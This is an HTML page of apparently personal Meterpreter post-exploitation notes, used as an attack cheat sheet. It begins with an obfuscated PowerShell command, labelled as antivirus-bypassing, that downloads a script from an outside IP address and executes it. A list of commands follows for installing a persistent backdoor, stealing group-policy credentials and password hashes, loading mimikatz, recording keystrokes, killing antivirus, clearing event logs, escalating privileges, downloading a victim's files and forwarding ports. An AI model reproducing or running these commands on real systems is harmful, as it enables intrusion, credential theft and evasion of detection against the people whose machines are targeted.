<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Meterpreter</title>
</head><body><b>Turning Meterpreter into PowerShell &nbsp;<br/>
<br/>
</b>post/windows/manage/payload_inject <b>&nbsp;<br/>
</b><b><br/>
windows exec payload example with AV bypassing payload<br/>
<br/>
</b>powershell.exe "(New-Object Net.WebClient).(((((New-Object Net.WebClient)).PsObject.Methods)|Where-Object{$_.Name-ilike'*nl*g'}).Name).Invoke('http://74.134.249.8/test.ps1') | IEX"<b><br/>
</b><b><br/>
</b><b>**To keep shell from dying -- set all multi handler options, before actually running the multi-handler, type the following for persistence</b><br/>
<br/>
exec cmd.exe -f -h<br/>
<br/>
set autorunscript explorer.exe<br/>
<br/>
set autorunscript migrate -f<br/>
<br/>
run post/windows/manage/migrate <br/>
<br/>
run persistence &nbsp;&lt;--for a back door<br/>
<br/>
run post/windows/gather/credentials/gpp &nbsp;&lt;--get group policy creds<br/>
<br/>
run getgui &lt;--enable rdp<br/>
<br/>
clearev &lt;--clear event log<br/>
<br/>
run post/windows/capture/keylog_recorder &nbsp;&lt;--record keystrokes<br/>
<br/>
run killav &lt;-- kill anti virus<br/>
<br/>
run vnc &lt;-- get a gui :)<br/>
<br/>
run hashdump &lt;--dump system hashes<br/>
<br/>
run post/windows/gather/dumplinks &nbsp;&lt;---gather link files that may be useful<br/>
<br/>
run post/windows/gather/enum_applications &nbsp;&lt;--enumerate applications<br/>
<br/>
load mimikatz &nbsp;&lt;----- load mimikatz function (IE password dumps etc)<br/>
<br/>
getsystem &lt;------escalate privs<br/>
<br/>
run post/windows/gather/credentials/mssql_local_hashdump &nbsp;&lt;--dump database<br/>
<br/>
run winenum &nbsp; &nbsp;&lt;----enumerate system in meterpreter (files get stored in .msf4 or .msf8)<br/>
<br/>
run post/windows/gather/win_privs &lt;---check if you are an admin<br/>
<br/>
run post/multi/recon/local_exploit_suggester &nbsp;&lt;----check for privilege escalation<br/>
<br/>
run post/windows/gather/credentials/credential_collector<br/>
<br/>
run post/windows/gather/enum_ms_product_keys<br/>
<br/>
execute -f cmd.exe -i -H &nbsp;&lt;-----run commands in meterpreter<br/>
<br/>
meterpreter &gt; download C:\\bank-account.zip /root/Desktop/bank-account.zip<br/>
[*] downloading: C:\bank-account.zip -&gt; /root/Desktop/bank-account.zip<br/>
[*] download &nbsp; : C:\bank-account.zip -&gt; /root/Desktop/bank-account.zip<br/>
<br/>
portfwd add -l 1234 -p 445 -r 10.11.1.14<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;my port | their port - the ip address is the victim IP<br/>
<br/>
<br/>
</body></html>